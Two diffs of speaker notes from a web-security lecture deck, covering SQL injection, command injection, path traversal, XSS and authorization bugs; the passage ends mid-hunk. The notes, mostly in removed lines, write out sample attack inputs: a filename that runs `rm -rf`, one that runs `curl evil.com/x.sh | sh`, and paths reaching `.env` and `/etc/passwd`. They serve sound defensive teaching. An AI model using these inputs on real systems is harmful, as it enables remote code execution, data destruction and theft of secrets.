--- a/lectures/Lecture 9.2 - Security.pptx
+++ b/lectures/Lecture 9.2 - Security.pptx
@@ -1516,7 +1516,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>SQL injection is one of the most common web vulnerabilities (OWASP Top 10). The fix is simple: never put user input directly in SQL strings. Always use :param placeholders and pass values in a dict. This applies to ALL SQL, not just SELECT.</a:t>
+              <a:t>SQL injection is one of the most common web vulnerabilities out there and it's been on the OWASP Top 10 essentially forever. The fix is boring: never put user input into a SQL string, use :param placeholders and hand the values over in a dict. And it's ALL SQL, not only the SELECTs.</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>
@@ -1832,7 +1832,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>The retrospective payoff. Students have been writing parameterized queries all semester because that's what SQLAlchemy's text() helper makes easy...the name-by-name comparison point is really the crucial one - show that :name is a value slot that the DB treats as a literal, not a structural element. This is secure by default in action, and it's worth pausing to let them appreciate that they've been doing it right this whole time without knowing.</a:t>
+              <a:t>Another retrospective one. Students have been writing parameterized queries all semester because that's what SQLAlchemy's text() helper makes easy...the name-by-name comparison point is really the crucial one - show that :name is a value slot that the DB treats as a literal, not a structural element. This is secure by default in action, and it's worth pausing to let them appreciate that they've been doing it right this whole time without knowing.</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>
@@ -3232,7 +3232,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>The second major attack class. The key insight really is that your content runs in your users' browsers, with their permissions...once they feel that, the fix lands easily.</a:t>
+              <a:t>The second major attack class. What really has to land is that your content runs in your users' browsers, with their permissions...once they feel that, the fix explains itself.</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>
@@ -3390,7 +3390,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>The chain-of-events framing is really important - XSS isn't one bug, it's a collaboration between a storage bug (accepting arbitrary content) and a rendering bug (not escaping on display). The second one is what this lecture focuses on because it's the one that's always wrong...you can usually argue about whether to filter on storage, but you can't argue about escaping on render.</a:t>
+              <a:t>The chain-of-events framing is really important - XSS is a collaboration between a storage bug, where you accept arbitrary content, and a rendering bug, where you don't escape it on the way back out, so there isn't one single bug to point at. The second one is what this lecture focuses on because it's the one that's always wrong...you can usually argue about whether to filter on storage, but you can't argue about escaping on render.</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>
@@ -4022,7 +4022,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>The chain-of-events framing is really important - XSS isn't one bug, it's a collaboration between a storage bug (accepting arbitrary content) and a rendering bug (not escaping on display). The second one is what this lecture focuses on because it's the one that's always wrong...you can usually argue about whether to filter on storage, but you can't argue about escaping on render.</a:t>
+              <a:t>The chain-of-events framing is really important - XSS is a collaboration between a storage bug, where you accept arbitrary content, and a rendering bug, where you don't escape it on the way back out, so there isn't one single bug to point at. The second one is what this lecture focuses on because it's the one that's always wrong...you can usually argue about whether to filter on storage, but you can't argue about escaping on render.</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>
@@ -4180,7 +4180,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>Two secure-by-default patterns side by side. textContent is the DOM equivalent. JSX's curly-brace interpolation is the React version, and it auto-escapes by default. The 'dangerously' naming is really the React team doing what a good framework does: making the unsafe option loud and obvious. Any student tempted to use it should treat the word as a stop sign, not a suggestion.</a:t>
+              <a:t>Two secure-by-default patterns side by side. textContent is the DOM equivalent. JSX's curly-brace interpolation is the React version, and it auto-escapes by default. The 'dangerously' naming is really the React team doing what a good framework does, which is making the unsafe option loud enough that nobody reaches for it by accident. Anyone tempted to use it should read that word as a stop sign.</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>
@@ -4338,7 +4338,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>Two secure-by-default patterns side by side. textContent is the DOM equivalent. JSX's curly-brace interpolation is the React version, and it auto-escapes by default. The 'dangerously' naming is really the React team doing what a good framework does: making the unsafe option loud and obvious. Any student tempted to use it should treat the word as a stop sign, not a suggestion.</a:t>
+              <a:t>Two secure-by-default patterns side by side. textContent is the DOM equivalent. JSX's curly-brace interpolation is the React version, and it auto-escapes by default. The 'dangerously' naming is really the React team doing what a good framework does, which is making the unsafe option loud enough that nobody reaches for it by accident. Anyone tempted to use it should read that word as a stop sign.</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>
@@ -4654,7 +4654,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>Two secure-by-default patterns side by side. textContent is the DOM equivalent. JSX's curly-brace interpolation is the React version, and it auto-escapes by default. The 'dangerously' naming is really the React team doing what a good framework does: making the unsafe option loud and obvious. Any student tempted to use it should treat the word as a stop sign, not a suggestion.</a:t>
+              <a:t>Two secure-by-default patterns side by side. textContent is the DOM equivalent. JSX's curly-brace interpolation is the React version, and it auto-escapes by default. The 'dangerously' naming is really the React team doing what a good framework does, which is making the unsafe option loud enough that nobody reaches for it by accident. Anyone tempted to use it should read that word as a stop sign.</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>
@@ -6999,7 +6999,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>Two bugs that compound. First: user_id is read from the URL path but never checked against the logged-in user. Attacker requests `DELETE /users/999/posts/100` and the user_id parameter is ignored entirely - it's decorative. Second: the DELETE itself doesn't check post ownership at all, just deletes by id. Combined, any logged-in user can delete any post in the database with `DELETE /users/&lt;anything&gt;/posts/&lt;id&gt;`. Key teaching point: the frontend's URL construction is not a security boundary. Attackers don't use your frontend. They use curl.</a:t>
+              <a:t>Two bugs that compound. First: user_id is read from the URL path but never checked against the logged-in user. Attacker requests `DELETE /users/999/posts/100` and the user_id parameter is ignored entirely - it's decorative. Second: the DELETE itself doesn't check post ownership at all, just deletes by id. Combined, any logged-in user can delete any post in the database with `DELETE /users/&lt;anything&gt;/posts/&lt;id&gt;`. Key teaching point is that the frontend's URL construction is not a security boundary of any kind - an attacker isn't going through your frontend at all, they're sitting there with curl.</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>
@@ -7543,7 +7543,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>This is the subtle one and it's a real, common, dangerous bug - cross-tenant data leak. The authorization check is present AND correct: it verifies you're a member of org_id. The bug is that it authorizes the CONTAINER (the org) but the action touches the ITEM (the invoice), and nothing ties the invoice back to the org. So a member of org 5 (which they legitimately belong to) requests /orgs/5/invoices/9999 where invoice 9999 belongs to org 200. Membership check passes - they really are in org 5. Invoice fetch ignores the org entirely. They just read another company's invoice. This is how multi-tenant SaaS apps leak across customers, and it's a favorite of bug-bounty hunters. The lesson: authorize the thing you're actually touching, not its parent.</a:t>
+              <a:t>This is the subtle one and it's a real, common, dangerous bug - cross-tenant data leak. The authorization check is present AND correct: it verifies you're a member of org_id. The bug is that it authorizes the CONTAINER (the org) but the action touches the ITEM (the invoice), and nothing ties the invoice back to the org. So a member of org 5 (which they legitimately belong to) requests /orgs/5/invoices/9999 where invoice 9999 belongs to org 200. Membership check passes - they really are in org 5. Invoice fetch ignores the org entirely. They just read another company's invoice. This is how multi-tenant SaaS apps leak across customers, and it's a favorite of bug-bounty hunters. The lesson to say out loud is that you authorize the thing you're actually touching, rather than the container it happens to sit in.</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>
@@ -11600,7 +11600,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US"/>
-              <a:t>This is really the retrospective payoff, and the emotional tone matters - every callback is a moment from an earlier lecture where students didn't know they were doing the security-relevant thing. Today they learn those choices were the whole point. The register is 'you were always on the right path', not 'here's a bunch of scary new stuff you don't know.'</a:t>
+              <a:t>This is the retrospective part and the emotional tone matters a lot - every callback is a moment from an earlier lecture where they didn't know they were doing the security-relevant thing. Today they learn those choices were the whole point. The register is 'you were always on the right path', not 'here's a bunch of scary new stuff you don't know.'</a:t>
             </a:r>
             <a:endParaRPr/>
           </a:p>

--- a/lectures/Lecture 9.2 - Security.pptx
+++ b/lectures/Lecture 9.2 - Security.pptx
@@ -1031,20 +1031,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The practical action item. Students should leave able to recognize 'dangerous/raw/unsafe' naming as a flashing warning sign - most of the time the framework already provides a safe alternative right next to the dangerous one, you just have to prefer it. And if your coding agent reaches for one of these, push back on it hard, it'll usually pick the scary one because the docs mention both.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Watch for agent code that reaches for the dangerous API; reject it.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -1188,22 +1177,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The most common attack class on the web, and it's been that way for about as long as the web has existed. SQL injection is the canonical example but the pattern really generalizes to commands, paths, and more.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -1347,20 +1321,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The generalization is really what matters here. The easy thing to walk away with is just 'SQL injection', but the actual pattern is 'never build a structured thing from untrusted strings' and that applies to shell commands, file paths, headers, anywhere you're constructing something the system is going to parse. Keep pulling that thread through the slide.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Also headers, anything the system will parse.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -1505,20 +1468,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>SQL injection is one of the most common web vulnerabilities out there and it's been on the OWASP Top 10 essentially forever. The fix is boring: never put user input into a SQL string, use :param placeholders and hand the values over in a dict. And it's ALL SQL, not only the SELECTs.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>OWASP Top 10 essentially forever. Parameterize all SQL, UPDATE and DELETE too.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -1663,20 +1615,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The classic 'Bobby Tables' attack. Walk through the final query really carefully line by line - the attacker's payload closes the string literal with a quote, ends the first statement with a semicolon, issues a DROP TABLE, and then comments out the trailing quote so the rest of the line doesn't break parsing. Every student has seen this XKCD comic at some point, and now they finally see the mechanism behind the joke.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>XKCD Bobby Tables. Walk payload: quote closes literal, semicolon, DROP, `--` eats trailing quote.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -1820,22 +1761,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Another retrospective one. Students have been writing parameterized queries all semester because that's what SQLAlchemy's text() helper makes easy...the name-by-name comparison point is really the crucial one - show that :name is a value slot that the DB treats as a literal, not a structural element. This is secure by default in action, and it's worth pausing to let them appreciate that they've been doing it right this whole time without knowing.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -1979,20 +1905,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The numbers really do the work here. Heartland is the scale story (~130M cards, nine-figure damages). TalkTalk is the embarrassment story (a teenager with no special tools took down a public company). Both attacks were literally the previous slide's vulnerability. Land that this is not historical - the f-string mistake is still shipping in 2026.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Both were exactly the previous slide's f-string. Still shipping in 2026.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -2136,22 +2051,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The most common attack class on the web, and it's been that way for about as long as the web has existed. SQL injection is the canonical example but the pattern really generalizes to commands, paths, and more.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -2295,64 +2195,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># It's just a filename going into a command. What's the worst</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># an attacker can put in that filename?</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Give them a minute. The filename is concatenated straight into a string handed to os.system, which runs it through the shell. The shell interprets semicolons, pipes, backticks, dollar-parens - all of it. An attacker uploads a file (or just sends a filename) of `cat.png; rm -rf /tmp/* #` and the shell happily runs the convert command AND the rm. Or `cat.png; curl evil.com/x.sh | sh #` to download and execute a payload - that's full remote code execution on your server. The mistake is identical to SQL injection: untrusted text became part of a structured thing (a shell command) the system parses. Don't reveal the fix yet - next two slides give one more example, then the rule.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>1 min. Answer: command injection, `cat.png; rm -rf /tmp/* #`. Fix comes after next slide.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -2497,55 +2342,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># What happens if filename = "../../.env"?</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># Or "../../../../etc/passwd"?</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:br>
-              <a:rPr lang="en-US"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Same shape, different target. The filename is concatenated into a file path, and `../` walks up out of the uploads directory. `../../.env` hands the attacker your secrets file - database URL, API keys, the Supabase service role key. `../../../../etc/passwd` reads system files. They can read your source code, your config, anything the server process can read. Note that authentication does NOT help here - the attacker IS logged in, as themselves. This is an authorization-adjacent failure that's really an injection: untrusted text became part of a structured thing (a filesystem path). Now do the reveal slide.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Answer: path traversal, `../../.env` leaks secrets. Auth doesn't help, attacker is logged in.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -2690,48 +2489,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># The authentication check ran. The user is definitely logged in.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t># What's wrong here?</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Take guesses only; full answer at slide 35 (missing ownership check).</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -2894,20 +2654,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Generalization beyond SQL is where this really earns its keep. Subprocess.run with an argument list is the Python way to avoid command injection - the shell never sees the user input as text. pathlib's joinpath plus resolve plus an explicit containment check is how you protect against path traversal...the containment check is the piece people forget, so call it out.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Argument list means the shell never parses the input. Don't skip the containment check.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3063,20 +2812,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Generalization beyond SQL is where this really earns its keep. Subprocess.run with an argument list is the Python way to avoid command injection - the shell never sees the user input as text. pathlib's joinpath plus resolve plus an explicit containment check is how you protect against path traversal...the containment check is the piece people forget, so call it out.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Argument list means the shell never parses the input. Don't skip the containment check.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3220,22 +2958,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The second major attack class. What really has to land is that your content runs in your users' browsers, with their permissions...once they feel that, the fix explains itself.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -3379,20 +3102,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The chain-of-events framing is really important - XSS is a collaboration between a storage bug, where you accept arbitrary content, and a rendering bug, where you don't escape it on the way back out, so there isn't one single bug to point at. The second one is what this lecture focuses on because it's the one that's always wrong...you can usually argue about whether to filter on storage, but you can't argue about escaping on render.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Two bugs, storage and render. Escape on render is the one that's always required.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3537,20 +3249,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The concrete payload. Students should understand exactly what happens here: innerHTML tells the browser 'parse this string as HTML and insert the result into the DOM.' When the string is an attacker's script tag, the browser parses it as a real script tag and executes it with the victim's permissions...no magic, just the browser doing literally what it was told.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>innerHTML: browser parses the string as HTML and executes any script.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3695,20 +3396,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The concrete payload. Students should understand exactly what happens here: innerHTML tells the browser 'parse this string as HTML and insert the result into the DOM.' When the string is an attacker's script tag, the browser parses it as a real script tag and executes it with the victim's permissions...no magic, just the browser doing literally what it was told.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Script runs with the victim's cookies and permissions.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3853,20 +3543,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The concrete payload. Students should understand exactly what happens here: innerHTML tells the browser 'parse this string as HTML and insert the result into the DOM.' When the string is an attacker's script tag, the browser parses it as a real script tag and executes it with the victim's permissions...no magic, just the browser doing literally what it was told.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Script runs with the victim's cookies and permissions.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4011,20 +3690,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The chain-of-events framing is really important - XSS is a collaboration between a storage bug, where you accept arbitrary content, and a rendering bug, where you don't escape it on the way back out, so there isn't one single bug to point at. The second one is what this lecture focuses on because it's the one that's always wrong...you can usually argue about whether to filter on storage, but you can't argue about escaping on render.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Two bugs, storage and render. Escape on render is the one that's always required.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4168,22 +3836,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Two secure-by-default patterns side by side. textContent is the DOM equivalent. JSX's curly-brace interpolation is the React version, and it auto-escapes by default. The 'dangerously' naming is really the React team doing what a good framework does, which is making the unsafe option loud enough that nobody reaches for it by accident. Anyone tempted to use it should read that word as a stop sign.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -4326,22 +3979,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Two secure-by-default patterns side by side. textContent is the DOM equivalent. JSX's curly-brace interpolation is the React version, and it auto-escapes by default. The 'dangerously' naming is really the React team doing what a good framework does, which is making the unsafe option loud enough that nobody reaches for it by accident. Anyone tempted to use it should read that word as a stop sign.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -4484,22 +4122,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Frame what a web server actually is before you touch any specific attack. Students really need the threat-model lens before they can recognize attacks as attacks.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -4642,22 +4265,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
